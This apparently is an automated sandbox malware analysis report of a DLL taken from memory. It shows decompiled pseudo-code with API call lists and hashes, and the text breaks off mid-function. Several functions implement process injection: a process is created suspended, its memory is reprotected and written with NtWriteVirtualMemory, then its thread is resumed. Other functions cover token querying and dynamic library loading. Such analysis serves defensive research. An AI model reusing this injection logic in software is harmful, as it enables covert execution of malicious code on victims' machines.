    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .dll
    • API String ID: 2574300362-2738580789
    • Opcode ID: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
    • Instruction ID: 92068ddf64b08cb5eb3d3d525696bfeba362b6a2b2ffb4815a15ed8f4a6c1621
    • Opcode Fuzzy Hash: a4feeca1574f2cd99d59b1fbc4639384f3d17a533a0fe7c5f4faee7675ce88ca
    • Instruction Fuzzy Hash: 9831F535A002999BEB54CF69C8C47AEBBF5EF44384F244469D945E7209DBB0ED82CB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E1000CA30(intOrPtr __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				char _v24;
    				void* _v36;
    				char _v40;
    				char _v80;
    				char _t37;
    				intOrPtr _t38;
    				void* _t45;
    				intOrPtr _t47;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				intOrPtr _t52;
    				void* _t54;
    				intOrPtr _t57;
    				long _t61;
    				intOrPtr _t62;
    				signed int _t65;
    				signed int _t68;
    				signed int _t82;
    				void* _t85;
    				char _t86;
    
    				_v8 = _v8 & 0x00000000;
    				_v20 = __edx;
    				_t65 = 0;
    				_t37 = E1000C908( &_v8);
    				_t86 = _t37;
    				_v24 = _t86;
    				_t87 = _t86;
    				if(_t86 == 0) {
    					return _t37;
    				}
    				_t38 =  *0x1001e688; // 0x87804a0
    				E1000A853( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t87);
    				_t82 = _v8;
    				_t68 = 0;
    				_v16 = 0;
    				if(_t82 == 0) {
    					L20:
    					E10008600( &_v24, 0);
    					return _t65;
    				}
    				while(_t65 == 0) {
    					while(_t65 == 0) {
    						asm("stosd");
    						asm("stosd");
    						asm("stosd");
    						asm("stosd");
    						_t45 = E1000AE4C( *((intOrPtr*)(_t86 + _t68 * 4)),  &_v40); // executed
    						_t92 = _t45;
    						if(_t45 >= 0) {
    							_t54 = E1000CB82(E10005CD4,  &_v40, _t92, _v20); // executed
    							if(_t54 != 0) {
    								_t57 =  *0x1001e684; // 0x87ff878
    								_t85 =  *((intOrPtr*)(_t57 + 0xc4))(0, 0, 0,  &_v80);
    								if(_t85 != 0) {
    									GetLastError();
    									_t61 = ResumeThread(_v36);
    									_t62 =  *0x1001e684; // 0x87ff878
    									if(_t61 != 0) {
    										_push(0xea60);
    										_push(_t85);
    										if( *((intOrPtr*)(_t62 + 0x2c))() == 0) {
    											_t65 = _t65 + 1;
    										}
    										_t62 =  *0x1001e684; // 0x87ff878
    									}
    									FindCloseChangeNotification(_t85);
    								}
    							}
    						}
    						if(_v40 != 0) {
    							if(_t65 == 0) {
    								_t52 =  *0x1001e684; // 0x87ff878
    								 *((intOrPtr*)(_t52 + 0x104))(_v40, _t65);
    							}
    							_t48 =  *0x1001e684; // 0x87ff878
    							 *((intOrPtr*)(_t48 + 0x30))(_v36);
    							_t50 =  *0x1001e684; // 0x87ff878
    							 *((intOrPtr*)(_t50 + 0x30))(_v40);
    						}
    						_t68 = _v16;
    						_t47 = _v12 + 1;
    						_v12 = _t47;
    						if(_t47 < 2) {
    							continue;
    						} else {
    							break;
    						}
    					}
    					_t82 = _v8;
    					_t68 = _t68 + 1;
    					_v16 = _t68;
    					if(_t68 < _t82) {
    						continue;
    					} else {
    						break;
    					}
    					do {
    						goto L19;
    					} while (_t82 != 0);
    					goto L20;
    				}
    				L19:
    				E10008600(_t86, 0xfffffffe);
    				_t86 = _t86 + 4;
    				_t82 = _t82 - 1;
    			}

    APIs
      • Part of subcall function 1000AE4C: memset.MSVCRT ref: 1000AE6B
      • Part of subcall function 1000AE4C: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B
      • Part of subcall function 1000CB82: memset.MSVCRT ref: 1000CBC3
      • Part of subcall function 1000CB82: GetThreadContext.KERNELBASE(?,00010002,?,00000000,00000000), ref: 1000CBE4
      • Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC2D
      • Part of subcall function 1000CB82: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC4A
      • Part of subcall function 1000CB82: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC6B
      • Part of subcall function 1000CB82: FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC7E
    • GetLastError.KERNEL32(?,00000001), ref: 1000CAD7
    • ResumeThread.KERNELBASE(?,?,00000001), ref: 1000CAE5
    • FindCloseChangeNotification.KERNELBASE(00000000,?,00000001), ref: 1000CB08
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryVirtual$ProtectThreadmemset$ChangeCloseContextCreateErrorFindFreeLastLibraryNotificationProcessResumeWrite
    • String ID:
    • API String ID: 444334107-0
    • Opcode ID: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
    • Instruction ID: e521cf2fa20f76da4a6a589b73753f886015824dfe40e4b6c65f35b4029dd3c9
    • Opcode Fuzzy Hash: f017f5ca36172552206ab6814e1b6acc202bbb2cd86ed6c5daeb2e80a43bce25
    • Instruction Fuzzy Hash: BC416175A00319AFEB41CFA8C985EAE77F9EF58390F624168F501E7265DB30AE04CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E1000B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
    				long _v8;
    				void* _v12;
    				void* _t12;
    				void* _t20;
    				void* _t22;
    				union _TOKEN_INFORMATION_CLASS _t28;
    				void* _t31;
    
    				_push(_t22);
    				_push(_t22);
    				_t31 = 0;
    				_t28 = __edx;
    				_t20 = _t22;
    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L6:
    					_t12 = _t31;
    				} else {
    					_t31 = E100085EA(_v8);
    					_v12 = _t31;
    					if(_t31 != 0) {
    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
    							goto L6;
    						} else {
    							E10008600( &_v12, _t16);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t12 = 0;
    					}
    				}
    				return _t12;
    			}

    APIs
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
    • GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0
      • Part of subcall function 100085EA: RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9CF
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: InformationToken$AllocateErrorHeapLast
    • String ID:
    • API String ID: 2499131667-0
    • Opcode ID: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
    • Instruction ID: 284435f3304a0403768820705fc5d69a9fc577f17fcada2a8c023e96f564319f
    • Opcode Fuzzy Hash: 9279372076375fae395de7efc729ad16c310fd33d23b52249bdd110484013589
    • Instruction Fuzzy Hash: C401AD72600625BFE724CFA5DC89D8F7FECEF456E47220126FA05E2214E630DE0087A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E1000AE4C(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
    				struct _STARTUPINFOW _v72;
    				signed int _t11;
    				WCHAR* _t15;
    				int _t19;
    				struct _PROCESS_INFORMATION* _t20;
    
    				_t20 = __edx;
    				_t15 = __ecx;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t19 = 0x44;
    				memset( &_v72, 0, _t19);
    				_v72.cb = _t19;
    				_t11 = CreateProcessW(0, _t15, 0, 0, 0, 4, 0, 0,  &_v72, _t20);
    				asm("sbb eax, eax");
    				return  ~( ~_t11) - 1;
    			}

    APIs
    • memset.MSVCRT ref: 1000AE6B
    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 1000AE8B
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateProcessmemset
    • String ID:
    • API String ID: 2296119082-0
    • Opcode ID: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
    • Instruction ID: 317c0f0a3250aa545c808d97f4cc2eb77fe6aff884bafd0b8a01d2d5859a8f4e
    • Opcode Fuzzy Hash: 174ec3214e28821afa587fbbfd75607311efd5e59e5c1ad3bc0eb5b6b150231f
    • Instruction Fuzzy Hash: 61F01CF26042187FF760DAADDC46EBBB7ACCB88664F104532FA05D61A0E560ED0582A1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E1000E1C7(void* __ecx, void* __edx, intOrPtr _a4) {
    				char _v8;
    				char _t5;
    				struct HINSTANCE__* _t7;
    				void* _t10;
    				void* _t12;
    				void* _t22;
    				void* _t25;
    
    				_push(__ecx);
    				_t12 = __ecx;
    				_t22 = __edx;
    				_t5 = E100095AD(_a4);
    				_t25 = 0;
    				_v8 = _t5;
    				_push(_t5);
    				if(_a4 != 0x7c3) {
    					_t7 = LoadLibraryA(); // executed
    				} else {
    					_t7 = GetModuleHandleA();
    				}
    				if(_t7 != 0) {
    					_t10 = E1000E17C(_t12, _t22, _t7); // executed
    					_t25 = _t10;
    				}
    				E100085A8( &_v8);
    				return _t25;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,1001BA20), ref: 1000E1E9
    • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,1001BA20), ref: 1000E1F6
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleLibraryLoadModule
    • String ID:
    • API String ID: 4133054770-0
    • Opcode ID: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
    • Instruction ID: a81f8a8a0c32fb3f2a3472acf433f6b75368d58d8bdf92bb45fed00c9d335e66
    • Opcode Fuzzy Hash: cf321a245d88a0638fbef26b27aa7ee3fe0e7c4b77512a4ccbee289a1163a098
    • Instruction Fuzzy Hash: D1F08231700164ABF704DB6DDC8589EB3ECDB987D1711413AF406E3155DA70EE4087E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E1000CCCB(void* __ecx, intOrPtr _a4, signed int _a8) {
    				CHAR* _v8;
    				int _t28;
    				signed int _t31;
    				signed int _t34;
    				signed int _t35;
    				void* _t38;
    				signed int* _t41;
    
    				_t41 = _a8;
    				_t31 = 0;
    				if(_t41[1] > 0) {
    					_t38 = 0;
    					do {
    						_t3 =  &(_t41[2]); // 0xe6840d8b
    						_t34 =  *_t3;
    						_t35 = 0;
    						_a8 = 0;
    						if( *((intOrPtr*)(_t38 + _t34 + 8)) > 0) {
    							_v8 = _a4 + 0x24;
    							while(1) {
    								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
    								_t14 =  &(_t41[2]); // 0xe6840d8b
    								_t34 =  *_t14;
    								if(_t28 == 0) {
    									break;
    								}
    								_t35 = _a8 + 1;
    								_a8 = _t35;
    								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
    									continue;
    								} else {
    								}
    								goto L8;
    							}
    							 *_t41 =  *_t41 |  *(_t34 + _t38);
    						}
    						L8:
    						_t31 = _t31 + 1;
    						_t38 = _t38 + 0x10;
    						_t20 =  &(_t41[1]); // 0x1374ff85
    					} while (_t31 <  *_t20);
    				}
    				Sleep(0xa);
    				return 1;
    			}

    APIs
    • lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000ABF3,?,?), ref: 1000CCFF
    • Sleep.KERNELBASE(0000000A,00000000,?,?,?,1000ABF3,?,?), ref: 1000CD31
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: Sleeplstrcmpi
    • String ID:
    • API String ID: 1261054337-0
    • Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
    • Instruction ID: 926fc2af3184635391a797f2ab8243a47acf96363bf1e1ad5409ce987fcc7f05
    • Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
    • Instruction Fuzzy Hash: 21018C31600709AFEB10CF6AC8C0D5AB7E6FF983A4711C07EE95A8B215D230FA42DB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E1000BA48(void* __ecx, void* __esi) {
    				intOrPtr* _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				char _v24;
    				short _v28;
    				char _v32;
    				void* _t20;
    				intOrPtr* _t21;
    				intOrPtr _t29;
    				intOrPtr _t31;
    				intOrPtr* _t33;
    				intOrPtr _t34;
    				char _t37;
    				union _TOKEN_INFORMATION_CLASS _t44;
    				char _t45;
    				intOrPtr* _t48;
    
    				_t37 = 0;
    				_v28 = 0x500;
    				_t45 = 0;
    				_v32 = 0;
    				_t20 = E1000B92C(__ecx);
    				_v16 = _t20;
    				if(_t20 != 0) {
    					_push( &_v24);
    					_t44 = 2;
    					_t21 = E1000B97E(_t44); // executed
    					_t48 = _t21;
    					_v20 = _t48;
    					if(_t48 == 0) {
    						L10:
    						FindCloseChangeNotification(_v16);
    						if(_t48 != 0) {
    							E10008600( &_v20, _t37);
    						}
    						return _t45;
    					}
    					_push( &_v12);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push(0x220);
    					_push(0x20);
    					_push(2);
    					_push( &_v32);
    					_t29 =  *0x1001e68c; // 0x87ffa40
    					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
    						goto L10;
    					}
    					if( *_t48 <= 0) {
    						L9:
    						_t31 =  *0x1001e68c; // 0x87ffa40
    						 *((intOrPtr*)(_t31 + 0x10))(_v12);
    						_t37 = 0;
    						goto L10;
    					}
    					_t9 = _t48 + 4; // 0x4
    					_t33 = _t9;
    					_v8 = _t33;
    					while(1) {
    						_push(_v12);
    						_push( *_t33);
    						_t34 =  *0x1001e68c; // 0x87ffa40
    						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
    							break;
    						}
    						_t37 = _t37 + 1;
    						_t33 = _v8 + 8;
    						_v8 = _t33;
    						if(_t37 <  *_t48) {
    							continue;
    						}
    						goto L9;
    					}
    					_t45 = 1;
    					goto L9;
    				}
    				return _t20;
    			}

    APIs
      • Part of subcall function 1000B92C: GetCurrentThread.KERNEL32 ref: 1000B93F
      • Part of subcall function 1000B92C: GetLastError.KERNEL32(?,?,1000BA62,73BCF500,10000000), ref: 1000B94D
      • Part of subcall function 1000B92C: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA62,73BCF500,10000000), ref: 1000B966
      • Part of subcall function 1000B97E: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
      • Part of subcall function 1000B97E: GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0
    • FindCloseChangeNotification.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CurrentErrorLast$ChangeCloseFindInformationNotificationProcessThreadToken
    • String ID:
    • API String ID: 2850644500-0
    • Opcode ID: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
    • Instruction ID: 1adc8f8ddfe33038bce3f4a157c31629282edc9b40e44d36358bc691b51babd1
    • Opcode Fuzzy Hash: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
    • Instruction Fuzzy Hash: 75215071A00619AFEB04DFA9DC85EAEB7F8EF48780B514069F601E7255D730DD00CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E10005E7E() {
    				intOrPtr _t3;
    
    				_t3 =  *0x1001e684; // 0x87ff878
    				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
    				ExitProcess(0);
    			}

    APIs
    • ExitProcess.KERNEL32(00000000), ref: 10005E95
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: ExitProcess
    • String ID:
    • API String ID: 621844428-0
    • Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
    • Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
    • Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
    • Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E100085EA(long _a4) {
    				void* _t2;
    
    				_t2 = RtlAllocateHeap( *0x1001e768, 8, _a4); // executed
    				return _t2;
    			}

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
    • Instruction ID: 9a291c990e77f445172f2a03277bd68ee76f3999a476da38a02c0ca707d440ed
    • Opcode Fuzzy Hash: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
    • Instruction Fuzzy Hash: CDB0923148461CFBFA421B91DC45A88BF69E708759F00C010F60C040B2CA72AA649B90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E100085D5() {
    				void* _t1;
    
    				_t1 = HeapCreate(0, 0x80000, 0); // executed
    				 *0x1001e768 = _t1;
    				return _t1;
    			}

    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE
    Memory Dump Source
    • Source File: 00000002.00000002.701441727.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.701429892.0000000010000000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
    • Instruction ID: 016c441e565f87a7eecd2a7559f4fcf8aaa250baf654664f6a0682c010cac13f
    • Opcode Fuzzy Hash: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
    • Instruction Fuzzy Hash: C7B012B0684B1056F2D01B204DC6B043590A308B0AF304000F308581D0C6B05104CB04
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 50%
    			E1000DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				void* _v28;
    				signed int _v32;
    				char _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				char* _v72;
    				signed short _v80;
    				signed int _v84;
    				char _v88;
    				char _v92;
    				char _v96;
    				intOrPtr _v100;
    				char _v104;
    				char _v616;
    				intOrPtr* _t159;
    				char _t165;
    				signed int _t166;
    				signed int _t173;
    				signed int _t178;
    				signed int _t186;
    				intOrPtr* _t187;
    				signed int _t188;
    				signed int _t192;
    				intOrPtr* _t193;
    				intOrPtr _t200;
    				intOrPtr* _t205;
    				signed int _t207;
    				signed int _t209;
    				intOrPtr* _t210;
    				intOrPtr _t212;
    				intOrPtr* _t213;
    				signed int _t214;
    				char _t217;
    				signed int _t218;
    				signed int _t219;
    				signed int _t230;
    				signed int _t235;
    				signed int _t242;
    				signed int _t243;
    				signed int _t244;
    				signed int _t245;
    				intOrPtr* _t247;
    				intOrPtr* _t251;
    				signed int _t252;
    				intOrPtr* _t253;
    				void* _t255;
    				intOrPtr* _t261;
    				signed int _t262;
    				signed int _t283;
    				signed int _t289;
    				char* _t298;
    				void* _t320;
    				signed int _t322;
    				intOrPtr* _t323;
    				intOrPtr _t324;
    				signed int _t327;
    				intOrPtr* _t328;
    				intOrPtr* _t329;
    
    				_v32 = _v32 & 0x00000000;
    				_v60 = _v60 & 0x00000000;
    				_v56 = __edx;
    				_v100 = __ecx;
    				_t159 = E1000D52E(__ecx);
    				_t251 = _t159;
    				_v104 = _t251;
    				if(_t251 == 0) {
    					return _t159;
    				}
    				_t320 = E100085EA(0x10);
    				_v36 = _t320;
    				_pop(_t255);
    				if(_t320 == 0) {
    					L53:
    					E10008600( &_v60, 0xfffffffe);
    					E1000D5E2( &_v104);
    					return _t320;
    				}
    				_t165 = E100095C7(_t255, 0x536);
    				 *_t328 = 0x609;
    				_v52 = _t165;
    				_t166 = E100095C7(_t255);
    				_push(0);
    				_push(_v56);
    				_v20 = _t166;
    				_push(_t166);
    				_push(_a4);
    				_t322 = E100092CB(_t165);
    				_v60 = _t322;
    				E100085BB( &_v52);
    				E100085BB( &_v20);
    				_t329 = _t328 + 0x20;
    				if(_t322 != 0) {
    					_t323 = __imp__#2;
    					_v40 =  *_t323(_t322);
    					_t173 = E100095C7(_t255, 0x9e4);
    					_v20 = _t173;
    					_v52 =  *_t323(_t173);
    					E100085BB( &_v20);
    					_t324 = _v40;
    					_t261 =  *_t251;
    					_t252 = 0;
    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
    					__eflags = _t178;
    					if(_t178 != 0) {
    						L52:
    						__imp__#6(_t324);
    						__imp__#6(_v52);
    						goto L53;
    					}
    					_t262 = _v32;
    					_v28 = 0;
    					_v20 = 0;
    					__eflags = _t262;
    					if(_t262 == 0) {
    						L49:
    						 *((intOrPtr*)( *_t262 + 8))(_t262);
    						__eflags = _t252;
    						if(_t252 == 0) {
    							E10008600( &_v36, 0);
    							_t320 = _v36;
    						} else {
    							 *(_t320 + 8) = _t252;
    							 *_t320 = E100091C9(_v100);
    							 *((intOrPtr*)(_t320 + 4)) = E100091C9(_v56);
    						}
    						goto L52;
    					} else {
    						goto L6;
    					}
    					while(1) {
    						L6:
    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
    						__eflags = _t186;
    						if(_t186 != 0) {
    							break;
    						}
    						_v16 = 0;
    						_v48 = 0;
    						_v12 = 0;
    						_v24 = 0;
    						__eflags = _v84;
    						if(_v84 == 0) {
    							break;
    						}
    						_t187 = _v28;
    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
    						__eflags = _t188;
    						if(_t188 >= 0) {
    							__imp__#20(_v24, 1,  &_v16);
    							__imp__#19(_v24, 1,  &_v48);
    							_t46 = _t320 + 0xc; // 0xc
    							_t253 = _t46;
    							_t327 = _t252 << 3;
    							_t47 = _t327 + 8; // 0x8
    							_t192 = E1000867E(_t327, _t47);
    							__eflags = _t192;
    							if(_t192 == 0) {
    								__imp__#16(_v24);
    								_t193 = _v28;
    								 *((intOrPtr*)( *_t193 + 8))(_t193);
    								L46:
    								_t252 = _v20;
    								break;
    							}
    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100085EA( *(_t327 +  *_t253) << 3);
    							_t200 =  *_t253;
    							__eflags =  *(_t327 + _t200 + 4);
    							if( *(_t327 + _t200 + 4) == 0) {
    								_t136 = _t320 + 0xc; // 0xc
    								E10008600(_t136, 0);
    								E10008600( &_v36, 0);
    								__imp__#16(_v24);
    								_t205 = _v28;
    								 *((intOrPtr*)( *_t205 + 8))(_t205);
    								_t320 = _v36;
    								goto L46;
    							}
    							_t207 = _v16;
    							while(1) {
    								_v12 = _t207;
    								__eflags = _t207 - _v48;
    								if(_t207 > _v48) {
    									break;
    								}
    								_v44 = _v44 & 0x00000000;
    								_t209 =  &_v12;
    								__imp__#25(_v24, _t209,  &_v44);
    								__eflags = _t209;
    								if(_t209 < 0) {
    									break;
    								}
    								_t212 = E100091C9(_v44);
    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
    								_t213 = _v28;
    								_t281 =  *_t213;
    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
    								__eflags = _t214;
    								if(_t214 < 0) {
    									L39:
    									__imp__#6(_v44);
    									_t207 = _v12 + 1;
    									__eflags = _t207;
    									continue;
    								}
    								_v92 = E100095C7(_t281, 0x250);
    								 *_t329 = 0x4cc;
    								_t217 = E100095C7(_t281);
    								_t283 = _v80;
    								_v96 = _t217;
    								_t218 = _t283 & 0x0000ffff;
    								__eflags = _t218 - 0xb;
    								if(__eflags > 0) {
    									_t219 = _t218 - 0x10;
    									__eflags = _t219;
    									if(_t219 == 0) {
    										L35:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											L38:
    											E100085BB( &_v92);
    											E100085BB( &_v96);
    											__imp__#9( &_v80);
    											goto L39;
    										}
    										_push(_v72);
    										_push(L"%d");
    										L37:
    										_push(0xc);
    										_push(_t289);
    										E10009626();
    										_t329 = _t329 + 0x10;
    										goto L38;
    									}
    									_t230 = _t219 - 1;
    									__eflags = _t230;
    									if(_t230 == 0) {
    										L33:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											goto L38;
    										}
    										_push(_v72);
    										_push(L"%u");
    										goto L37;
    									}
    									_t235 = _t230 - 1;
    									__eflags = _t235;
    									if(_t235 == 0) {
    										goto L33;
    									}
    									__eflags = _t235 == 1;
    									if(_t235 == 1) {
    										goto L33;
    									}
    									L28:
    									__eflags = _t283 & 0x00002000;
    									if((_t283 & 0x00002000) == 0) {
    										_v88 = E100095C7(_t283, 0x219);
    										E10009626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
    										E100085BB( &_v88);
    										_t329 = _t329 + 0x18;
    										_t298 =  &_v616;
    										L31:
    										_t242 = E100091C9(_t298);
    										L32:
    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
    										goto L38;
    									}
    									_t242 = E1000DA2B( &_v80);
    									goto L32;
    								}
    								if(__eflags == 0) {
    									__eflags = _v72 - 0xffff;
    									_t298 = L"TRUE";
    									if(_v72 != 0xffff) {
    										_t298 = L"FALSE";
    									}
    									goto L31;
    								}
    								_t243 = _t218 - 1;
    								__eflags = _t243;
    								if(_t243 == 0) {
    									goto L38;
    								}
    								_t244 = _t243 - 1;
    								__eflags = _t244;
    								if(_t244 == 0) {
    									goto L35;
    								}
    								_t245 = _t244 - 1;
    								__eflags = _t245;
    								if(_t245 == 0) {
    									goto L35;
    								}
    								__eflags = _t245 != 5;
    								if(_t245 != 5) {
    									goto L28;
    								}
    								_t298 = _v72;
    								goto L31;
    							}
    							__imp__#16(_v24);
    							_t210 = _v28;
    							 *((intOrPtr*)( *_t210 + 8))(_t210);
    							_t252 = _v20;
    							L42:
    							_t262 = _v32;
    							_t252 = _t252 + 1;
    							_v20 = _t252;
    							__eflags = _t262;
    							if(_t262 != 0) {
    								continue;
    							}
    							L48:
    							_t324 = _v40;
    							goto L49;
    						}
    						_t247 = _v28;
    						 *((intOrPtr*)( *_t247 + 8))(_t247);
